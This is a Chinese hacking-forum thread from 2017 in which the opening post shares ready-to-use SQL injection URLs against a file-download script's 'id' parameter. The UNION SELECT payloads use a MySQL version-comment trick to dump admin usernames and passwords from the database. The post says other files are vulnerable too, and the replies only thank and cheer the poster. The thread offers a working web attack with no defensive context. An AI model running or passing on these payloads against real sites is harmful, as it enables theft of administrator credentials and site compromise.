社区首页 › 漏洞情报 › MySQL文件上传-ID参数SQL注入

90_ 发表于 2017-2-8 09:28:11

MySQL文件上传-ID参数SQL注入

SQL Injection/Exploit :

# http://localhost//download.php?id=&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost//download.php?id=&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...

a136 发表于 2017-2-8 10:30:33

谢谢楼主的分享

wanmznh 发表于 2017-2-8 11:30:07

谢谢楼主的分享

小龙 发表于 2017-2-8 12:31:19

wilist 发表于 2017-2-8 12:42:53

支持中国红客联盟(ihonker.org)

asion 发表于 2017-2-8 12:53:48

支持，看起来还是可以的

54hacker 发表于 2017-2-8 13:21:55

支持，看起来还是可以的

Sty，涛 发表于 2017-2-8 13:44:19

Lucifer 发表于 2017-2-8 13:55:02

若冰 发表于 2017-2-8 14:47:25

查看完整版本: MySQL文件上传-ID参数SQL注入